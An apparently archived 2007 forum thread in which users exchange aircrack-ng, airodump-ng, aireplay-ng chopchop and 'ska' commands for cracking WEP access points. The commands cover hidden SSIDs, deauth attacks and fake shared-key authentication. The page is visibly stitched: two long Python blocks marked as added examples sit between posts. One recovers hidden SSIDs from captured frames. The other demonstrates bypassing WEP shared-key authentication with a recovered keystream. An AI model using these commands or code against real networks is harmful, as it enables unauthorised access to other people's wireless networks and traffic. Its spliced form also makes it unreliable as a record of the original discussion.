View Full Version : somebody can do it?
xhidex
05-04-2007, 11:10 AM
Hello!
I have had success cracking an AP with or without a client connected :) (thanks to everybody here!!) but I don't know how to crack an AP with a hidden SSID.
I see Kismet found my AP with the hidden SSID, but I don't know how to use aircrack and airodump to crack it when there is no SSID... can somebody help?? Thanks!!
-=Xploitz=-
05-04-2007, 05:17 PM
Hello!
I have had success cracking an AP with or without a client connected :) (thanks to everybody here!!) but I don't know how to crack an AP with a hidden SSID.
I see Kismet found my AP with the hidden SSID, but I don't know how to use aircrack and airodump to crack it when there is no SSID... can somebody help?? Thanks!!
I think I understand your question... maybe not... but if I do understand, then the answer is simple: use Kismet to find the name of the hidden network, then type the name of the hidden network in the appropriate field in airodump, as in:
airodump-ng -c 6 -e Xploitz -w <file name here> --ivs --bssid <AP MAC here> <your device here>
(Xploitz is the name of the hidden network.)
And for aircrack-ng use: aircrack-ng *.ivs -b <AP MAC here> and hit enter
or: aircrack-ng *.cap -b <bssid> and hit enter
Or, if you're using aircrack-ptw, remember not to use --ivs in airodump-ng, and your aircrack-ptw command will look like
aircrack-ptw *.cap or aircrack-ptw <name of saved file>.cap :)
jaymill23
05-04-2007, 11:29 PM
You can also use a deauth attack (if there are ever clients) to get the network name; it will show up in airodump when the client resends it.
sleepless
05-08-2007, 10:14 PM
Let's be clear: is it <NO SSID> or <HIDDEN SSID>? There is a difference.
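Added example, not from this thread and not code from Kismet or the aircrack-ng suite. It shows what the two "hidden" cases in the post above look like on the wire: the SSID element in the beacon is either zero-length, or it is kept at its real length but filled with NUL bytes (so the length of the name still leaks). It also implements the point from jaymill23's post: probe responses and (re)association requests carry the name in clear, so a capture that contains a client reconnecting after a deauth gives the SSID for the hidden BSSID. The management-frame layout is the standard 802.11 one; the sample frames, the MAC addresses and the name "Xploitz" are constructed for the example.

```python
# Added example, not from the thread or from Kismet/aircrack-ng: parse the
# SSID element out of 802.11 management frames.  Sample frames below are
# constructed; MAC addresses and the name "Xploitz" are made up.
import struct

BEACON, PROBE_REQ, PROBE_RESP, ASSOC_REQ = 0x80, 0x40, 0x50, 0x00
SSID_IE = 0
# bytes of fixed fields between the 24-byte MAC header and the tagged IEs
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, PROBE_REQ: 0, ASSOC_REQ: 4}


def mgmt_frame(subtype, addr1, addr2, bssid, fixed, ies):
    """Build a minimal management frame (no FCS) for the samples below."""
    hdr = bytes([subtype, 0]) + b"\x00\x00" + addr1 + addr2 + bssid + b"\x00\x00"
    return hdr + fixed + b"".join(bytes([eid, len(v)]) + v for eid, v in ies)


def parse_ies(body):
    """Tagged parameters -> {element id: value}; stops at a truncated element."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        if i + 2 + ln > len(body):
            break
        ies.setdefault(eid, body[i + 2:i + 2 + ln])
        i += 2 + ln
    return ies


def ssid_info(frame):
    """Classify the SSID element: 'empty' (zero length), 'nulls' (length kept,
    bytes zeroed), 'plain', or 'absent'."""
    if len(frame) < 24 or frame[0] & 0x0C != 0:
        raise ValueError("not an 802.11 management frame")
    subtype = frame[0] & 0xF0
    if subtype not in FIXED_LEN:
        raise ValueError("unsupported management subtype 0x%02x" % subtype)
    ssid = parse_ies(frame[24 + FIXED_LEN[subtype]:]).get(SSID_IE)
    if ssid is None:
        kind = "absent"
    elif len(ssid) == 0:
        kind = "empty"
    elif all(b == 0 for b in ssid):
        kind = "nulls"
    else:
        kind = "plain"
    return {"subtype": subtype, "bssid": frame[16:22].hex(":"), "ssid": ssid, "kind": kind}


def recover_hidden_ssids(frames):
    """BSSID -> real name for APs whose beacons hide the SSID, taken from the
    probe responses and (re)association requests that carry it in clear, e.g.
    after a deauth forces a client to reconnect."""
    hidden, revealed = set(), {}
    for fr in frames:
        info = ssid_info(fr)
        if info["subtype"] == BEACON and info["kind"] in ("empty", "nulls"):
            hidden.add(info["bssid"])
        elif info["subtype"] in (PROBE_RESP, ASSOC_REQ) and info["kind"] == "plain":
            revealed[info["bssid"]] = info["ssid"].decode("utf-8", "replace")
    return {b: s for b, s in revealed.items() if b in hidden}


# constructed capture: two kinds of hidden beacon, then a client re-associating
AP, STA, BCAST = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6
BEACON_FIXED = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)   # timestamp, interval, capability
ASSOC_FIXED = struct.pack("<HH", 0x0411, 10)                    # capability, listen interval
SAMPLE = [
    mgmt_frame(BEACON, BCAST, AP, AP, BEACON_FIXED, [(SSID_IE, b""), (3, b"\x06")]),
    mgmt_frame(BEACON, BCAST, AP, AP, BEACON_FIXED, [(SSID_IE, b"\x00" * 7), (3, b"\x06")]),
    mgmt_frame(ASSOC_REQ, AP, STA, AP, ASSOC_FIXED, [(SSID_IE, b"Xploitz")]),
]

if __name__ == "__main__":
    for fr in SAMPLE:
        print(ssid_info(fr))
    print(recover_hidden_ssids(SAMPLE))
```

Which label a given sniffer prints for each case is the tool's own convention; the parser above only reports what the element contains. Running it on the constructed capture classifies the first beacon as "empty", the second as "nulls" with a 7-byte name, and maps the BSSID to "Xploitz" from the association request.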
xhidex
05-17-2007, 12:47 PM
It says NO SSID... what is the difference?
xhidex
05-17-2007, 12:54 PM
And also a last question that I still don't understand... how do you do the fake auth when the network is SKA (Shared Key Auth) and not Open Auth? Thanks!!
shamanvirtuel
05-17-2007, 06:32 PM
Use ska, located in /pentest/wireless/.
With this you can normally do fake auth with shared key.
Like this:
aireplay-ng -4 rausb0
After saving a packet, remember the name of the xor file.
ska rausb0 "BSSID" APMAC FAKEMAC file.xor
Wait; after a while it will say you are authenticated and will exit.
Hope this helps.
xhidex
05-22-2007, 09:16 PM
Use ska, located in /pentest/wireless/.
With this you can normally do fake auth with shared key.
Like this:
aireplay-ng -4 rausb0
After saving a packet, remember the name of the xor file.
ska rausb0 "BSSID" APMAC FAKEMAC file.xor
Wait; after a while it will say you are authenticated and will exit.
Hope this helps.
Hello!!
So first, thank you so much! Now I feel close to being able to do a fake auth on an SKA network... but I still have some problems...
When I use the command "aireplay-ng 4 ath1" it starts to capture some packets and saves them in a .CAP and not in a .XOR file.
Then, after some minutes, it asks me if I want to try to authenticate with this packet. If I say "Yes" it tries something and then fails... if I say "No" it just asks me again with another key or packet...
However, I have tried to use the cap file like a xor, but when I use the command ska auth1 bssid mac fakemac file.cap it gives me an error because it doesn't have the command "ska".
Do you have any ideas? Thanks!
rumburak514
05-23-2007, 11:34 AM
Only when the chopchop attack succeeds will it save the xor file.
You should get:
.....Saving keystream in replay_dec-xxxxx.xor ...
So keep trying to send various packets.
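Added example, not from this thread and not code from aircrack-ng or the ska tool. It shows why the .xor keystream file that shamanvirtuel's recipe and rumburak514's post revolve around is enough to pass WEP shared-key authentication without knowing the key. Shared-key auth is a four-frame exchange: the AP sends a 128-byte challenge in clear (frame 2) and the client sends the same text back WEP-encrypted (frame 3). Anyone who captures one legitimate exchange, or recovers a keystream with chopchop, can XOR a fresh challenge with that keystream, reuse the IV (WEP never rejects a repeated IV), and the AP accepts it. The toy AP, the WEP key, the IV and the station names are made up; the format of aireplay-ng's .xor file is not reproduced, the keystream is just passed in as bytes. The auth frame body here is 136 bytes plus a 4-byte ICV, so a usable keystream needs at least 140 bytes, which the code checks.

```python
# Added example, not from the thread or from aircrack-ng: why a WEP keystream
# (the .xor file) is enough to pass shared-key authentication without the key.
# Key, IV and station names are made up; the AP is a toy model.
import os
import struct
import zlib

def rc4(key, n):
    """First n bytes of RC4 keystream for key (WEP uses IV || secret key)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def with_icv(data):
    """WEP integrity check value: CRC-32 appended to the plaintext."""
    return data + struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def auth_body(seq, status=0, challenge=None):
    """Authentication frame body: algorithm 1 (shared key), sequence number,
    status, plus the 128-byte challenge text element (ID 16) in frames 2 and 3."""
    body = struct.pack("<HHH", 1, seq, status)
    if challenge is not None:
        body += bytes([16, len(challenge)]) + challenge
    return body

def challenge_of(frame2):
    return frame2[8:136]          # 6 fixed bytes + 2-byte element header

def wep_encrypt(key, iv, data, keyid=0):
    """IV || key id || (data || ICV) XOR RC4(IV || key): what a real client sends."""
    pt = with_icv(data)
    return iv + bytes([keyid]) + xor(pt, rc4(iv + key, len(pt)))

class SharedKeyAP:
    """Toy AP: hands out a challenge, decrypts frame 3 with its WEP key and
    checks ICV and challenge.  It does not reject reused IVs, as WEP doesn't."""
    def __init__(self, wep_key):
        self.key, self.pending = wep_key, {}
    def challenge(self, sta):
        self.pending[sta] = os.urandom(128)
        return auth_body(2, challenge=self.pending[sta])
    def verify(self, sta, frame3):
        iv, ct = frame3[:3], frame3[4:]
        pt = xor(ct, rc4(iv + self.key, len(ct)))
        expected = with_icv(auth_body(3, challenge=self.pending.pop(sta, b"")))
        return auth_body(4, status=0 if pt == expected else 15)  # 15: challenge failure

def keystream_from_exchange(frame2, frame3):
    """Sniffed handshake: frame 2 has the challenge in clear, frame 3 has the
    same text encrypted, so XOR yields the keystream for frame 3's IV."""
    pt = with_icv(auth_body(3, challenge=challenge_of(frame2)))
    return frame3[:3], xor(frame3[4:], pt)

def fake_auth_response(iv, keystream, frame2):
    """Answer a new challenge using only a recovered keystream (what the ska
    tool does with the .xor file); needs 140 keystream bytes."""
    pt = with_icv(auth_body(3, challenge=challenge_of(frame2)))
    if len(keystream) < len(pt):
        raise ValueError("keystream too short: need %d bytes, have %d" % (len(pt), len(keystream)))
    return iv + b"\x00" + xor(pt, keystream)

def demo(wep_key=bytes.fromhex("0102030405")):
    """Returns the status code the AP gives the fake client (0 = success)."""
    ap = SharedKeyAP(wep_key)
    f2 = ap.challenge("legit")                                   # captured frame 2
    f3 = wep_encrypt(wep_key, b"\x11\x22\x33", auth_body(3, challenge=challenge_of(f2)))
    ap.verify("legit", f3)                                       # captured frame 3
    iv, ks = keystream_from_exchange(f2, f3)                     # no key used from here on
    f2_fake = ap.challenge("fake")
    status = ap.verify("fake", fake_auth_response(iv, ks, f2_fake))
    return struct.unpack("<H", status[4:6])[0]

if __name__ == "__main__":
    print("fake auth status:", demo())
```

The keystream the attacker ends up with is exactly RC4(IV || key) for that one IV, which is also what a chopchop-recovered packet gives you; the reason rumburak514 says to keep trying packets is that a keystream shorter than the auth body plus ICV cannot cover frame 3, which the ValueError branch above models.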
xhidex
05-23-2007, 05:29 PM
Only when the chopchop attack succeeds will it save the xor file.
You should get:
.....Saving keystream in replay_dec-xxxxx.xor ...
So keep trying to send various packets.
How can I do it?... Can you be more clear? Thanks!
rumburak514
05-23-2007, 06:35 PM
http://www.aircrack-ng.org/doku.php?id=korek_chopchop
vBulletin® v3.7.3, Copyright ©2000-2008, Jelsoft Enterprises Ltd.